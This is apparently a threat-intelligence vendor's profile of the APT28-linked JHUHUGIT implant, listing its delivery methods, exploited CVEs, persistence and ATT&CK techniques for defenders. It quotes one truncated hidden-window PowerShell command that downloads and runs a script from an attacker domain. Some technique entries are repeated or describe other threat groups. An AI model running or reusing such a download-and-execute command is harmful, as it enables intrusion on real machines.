JHUHUGIT
JHUHUGIT, also known as Gamefish and associated with the Sednit/Sofacy/APT28/Fancy Bear intrusion set, is a Windows backdoor/implant used in long-running Russian state-linked espionage operations. The content states that it was added to Fancy Bear’s toolkit in 2013 and that researchers observed it being delivered via spearphishing, the SedKit exploit kit, DDE-executed PowerShell from Word documents, a Flash zero-day, and a Java zero-day (CVE-2015-2590). It has also been associated with sandbox escape and privilege-escalation activity using CVE-2015-1701 and CVE-2015-2387, and later reporting ties APT28 exploitation chains to delivery of the GAMEFISH payload after CVE-2017-0262/CVE-2017-0263 exploitation.
Capabilities directly mentioned in the content include code injection into browser processes, screenshot capture by simulating the VK_SCREENSHOT key and reading the clipboard before converting the image to JPG, and Base64 encoding of C2 POST data in at least one variant. Persistence mechanisms explicitly cited include registration as a scheduled task at user logon and COM hijacking, including hijacking the MMDeviceEnumerator class and registering the payload as a Shell Icon Overlay handler COM object using CLSID {3543619C-D563-43f7-95EA-4DA7E1CC396A}. The content also notes that JHUHUGIT was built with code from the Carberp sources.
Operationally, JHUHUGIT appears in Sednit/APT28 workflows as an early-stage or standalone implant alongside other group malware such as Seduploader, Sedreco, Xagent, CHOPSTICK, CORESHELL, and ADVSTORESHELL. Reported targeting in the provided content includes governments, military and defense-related entities, embassies, and EU agencies, consistent with broader APT28 targeting of geopolitical, diplomatic, and defense organizations.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
25 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Analysis of the document revealed its end goal: dropping Sednit’s well-known reconnaissance tool, Seduploader. To achieve this, Sednit used two zero-day exploits: ... CVE-2017-0262 ... and ... CVE-2017-0263.
Analysis of the document revealed its end goal: dropping Sednit’s well-known reconnaissance tool, Seduploader. To achieve this, Sednit used two zero-day exploits: ... CVE-2017-0262 ... and ... CVE-2017-0263.
JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.
JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.
IoCs Table 2 lists a phishing document (f3805382ae2e23ff1147301d131a06e00e4ff75f) detected as Win32/Exploit.CVE-2016-4117.A; the report describes Sednit’s DealersChoice platform embedding Adobe Flash Player exploits in malicious Office documents.
IoCs Table 2 lists a lure document (World War3.docx; SHA-1 7aada8bcc0d1ab8ffb1f0fae4757789c6f5546a3) detected as SWF/Exploit.CVE-2017-11292.A; the report notes DealersChoice generates malicious documents with embedded Adobe Flash Player exploits.
Analysis of the document revealed its end goal: dropping Sednit’s well-known reconnaissance tool, Seduploader. To achieve this, Sednit used two zero-day exploits: ... CVE-2017-0262 ... and ... CVE-2017-0263.
The RTF attachment exploits the CVE-2015-1641 vulnerability to drop two DLLs on the system... This particular case is one among a series of attacks using the CVE-2015-1641 vulnerability launched from April 2016 by the Sednit group. | Seduploader serves as reconnaissance malware. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper.
Seduploader serves as reconnaissance malware. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper. | CVE-2015-2424 Microsoft Office 0-day at the time the Sednit group used it. Seduploader deployed with targeted phishing emails using a 0-day exploit for the Microsoft Office vulnerability CVE-2015-2424.
The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day (CVE-2015-2590) in July 2015. | JHUHUGIT (which is built with code from the Carberp sources)... its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox.
Table 3. Sedkit exploited vulnerabilities: CVE-2014-1510 / CVE-2014-1511 Firefox.
Table 3. Sedkit exploited vulnerabilities: CVE-2014-1510 / CVE-2014-1511 Firefox.
Table 1. Vulnerabilities exploited with targeted phishing attachments: CVE-2012-0158 Microsoft Office.
Table 1. Vulnerabilities exploited with targeted phishing attachments: CVE-2014-1761 Microsoft Word 0-day at the time the Sednit group used it.
The vulnerability CVE-2014-6332 was discovered in May 2014... Soon after the disclosure, a proof-of-concept was released... in October 2015 a simple revamped version of the original proof-of-concept was added to Sedkit. But the Sednit group went one step further in February 2016 by deploying a different exploit for this vulnerability.
Table 1. Vulnerabilities exploited with targeted phishing attachments: CVE-2010-3333 Microsoft Office.
Table 3. Sedkit exploited vulnerabilities: CVE-2015-5119 Adobe Flash. Revamped from Hacking Team leaked data.
Table 1. Vulnerabilities exploited with targeted phishing attachments: CVE-2013-2729 Adobe Acrobat Reader.
Table 3. Sedkit exploited vulnerabilities: CVE-2013-3897 Internet Explorer 8.
Table 1. Vulnerabilities exploited with targeted phishing attachments: CVE-2009-3129 Microsoft Excel.
CVE-2015-3043 Adobe Flash 0-day at the time Sedkit used it.
CVE-2015-7645 Adobe Flash 0-day at the time Sedkit used it.
Table 3. Sedkit exploited vulnerabilities: CVE-2013-1347 Internet Explorer 8.
CVE-2015-4902 Java 0-day at the time Sedkit used it.
Table 3. Sedkit exploited vulnerabilities: CVE-2014-1776 Internet Explorer 11.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Spear phishing campaigns or the SedKit exploit kit delivered the Seduploader first stage.
Techniques & procedures
25 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Initial Access
They also send emails purportedly containing links to news items, but instead linking to malware drop sites that install toolkits onto the target's computer.
Execution
5 techniques
Execution
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
“powershell.exe -NoP -sta -NonI -W Hidden… DownloadString('http://sendmevideo.org/.../eee.txt'); powershell -enc $e” / “Seduploader dropper replaced by PowerShell commands delivering the Seduploader payload.”
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.
Persistence
3 techniques
Persistence
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
5 techniques
Privilege Escalation
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors injecting shellcode, DLLs, or payloads into legitimate processes such as svchost.exe, explorer.exe, iexplore.exe, cmd.exe, lsass.exe, and browser processes.
APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges. ... APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host. ... multiple groups/tools exploit various CVEs to escalate privileges.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Stealth
6 techniques
Stealth
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
The content repeatedly describes malware and threat actors injecting shellcode, DLLs, or payloads into legitimate processes such as svchost.exe, explorer.exe, iexplore.exe, cmd.exe, lsass.exe, and browser processes.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
Credential Access
1 technique
Credential Access
Discovery
4 techniques
Discovery
"APT32 ... query the Windows Registry to gather system information"; "JHUHUGIT obtains ... hard drive information from Windows registry key HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"
The content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
Collection
2 techniques
Collection
Command and Control
3 techniques
Command and Control
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
50 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A first-stage loader delivered via spear phishing or SedKit as part of APT28's earlier implant chain.
Malware that injects its own functions into browser processes.
Backdoor that registers as a scheduled task to run at user logon.
Sofacy-associated implant used in espionage operations, deployed against diplomatic/government targets.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.